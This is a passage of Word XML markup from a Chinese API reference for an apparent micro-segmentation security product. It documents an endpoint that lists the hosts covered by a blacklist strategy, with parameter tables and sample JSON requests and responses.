              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A1EDD4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="56B2D22D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37FD7E94" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12EDC18B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4626B9CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="29943384" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2535E6FC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FEB14D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="188B0D91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1413C66D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35891F81" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="688A5574" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DFD28D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55AFF7AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E"/>
    <w:p w14:paraId="5ABD648A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="453" w:name="_Toc115166299"/>
      <w:bookmarkStart w:id="454" w:name="查看策略主机范围"/>
      <w:bookmarkEnd w:id="452"/>
      <w:r>
        <w:t>查看策略主机范围</w:t>
      </w:r>
      <w:bookmarkEnd w:id="453"/>
    </w:p>
    <w:p w14:paraId="2EC6E0EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAF6899" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms-srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/black-strategy/strategy-host-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4A4C6529"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1875"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1030"/>
        <w:gridCol w:w="6281"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="33F30EA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FD1BCD8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C469A56" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B9BB66D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FB23DA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4C3D3798" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E85C2E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C922401" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D7C1447" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C22C06F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="38698EBF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="638A90D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>msSwitchStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55E29085" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FCF1C0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7774017A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>微隔离插件状态，0-关闭</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="40FDFDDF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4495FEBE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>strategyId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="495A9232" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32A75378" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5839EB20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>策略id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5ECEE54C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B012648" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>strategyHostType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="262682EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E79B828" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E9AAC41" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>查询数据类型，0:被访问者类型，1:访问者类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2C212908" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="423F6A7A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15E4AA4E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00663FF7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DB0A119" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>分页的页数，默认0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6CFCBC7A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F2FDDD1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A5D6076" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B4A57ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E1BD665" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>分页的大小，默认50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0723507B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36D781B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>sorts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04982AD1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CAF4587" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B0B2F53" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>排序字段,多个用逗号隔开,sorts字段的约定不写表示升序，"-"表示降序</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70D3438A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D3028F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"page": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>"size": 50,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "sorts":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "10",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msSwitchStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strategyId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "629dbf65c56dd50d10c9a984",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strategyHostType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01162ADA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A76AD42" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"data": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"total": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"rows": [{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "10.106.24.15",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>matchIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"hostname": "wgl15d",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "l15a29a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"tags": [{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"id": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagColor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "#27C28E",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "628f270f5aa65ca9"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msSwitchStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"available": "yes",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "628f270f5aa65ca9",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"status": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onlineStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"filters": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"remark": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"success": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorDesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
